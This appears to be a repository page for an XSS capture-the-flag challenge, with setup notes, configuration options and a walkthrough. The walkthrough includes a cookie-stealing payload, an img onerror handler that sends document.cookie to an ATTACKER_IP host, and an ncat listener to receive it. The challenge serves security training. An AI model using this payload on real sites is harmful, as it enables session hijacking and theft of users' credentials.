web challenge
  • Python 43.4%
  • HTML 26.9%
  • Dockerfile 14.7%
  • CSS 12.5%
  • Shell 2.5%
Find a file
veri-tty e8ae4c3097 Initial commit: XSS challenge
Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
2026-02-13 16:35:24 +01:00
app Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
docker Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
description.md Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
Dockerfile Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
k8s.yaml Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
Pipfile Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
Pipfile.lock Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
README.md Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
run.sh Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00
spec.yaml Initial commit: XSS challenge 2026-02-13 16:35:24 +01:00

It's just text

Setup

  1. Set the flag in run.sh.
  2. Execute run.sh.

Additional configuration

  • app/config.py:
    • Change the difficulty of successful XSS by specifying strings that will be removed in FILTER.
    • Enable the Super Secret Admin Panel, where all messages are listed, by setting SUPER_SECRET_ADMIN_PANEL to True (or False to disable). It is available at /messages if the flag cookie (name: flag, value: flag) is set. This page escapes code html, but there are links to the unescaped versions.

Walkthrough

  1. Click on <Contact us> to get to the message page
  2. Listen to incoming traffic on your machine (ncat -lk 1337).
  3. Enter an email address and a message like <img src=invalid onerror="this.onerror=''; this.src='http://<ATTACKER_IP>:1337/' + escape(document.cookie)" />
  4. Decode the cookie.

Hints

  • Debug your script using the message link displayed after sending a message.
  • <script>...</script> does not work: Maybe some tags get removed. Use something else.
  • Maybe you can convince the admin to deliver the flag to you.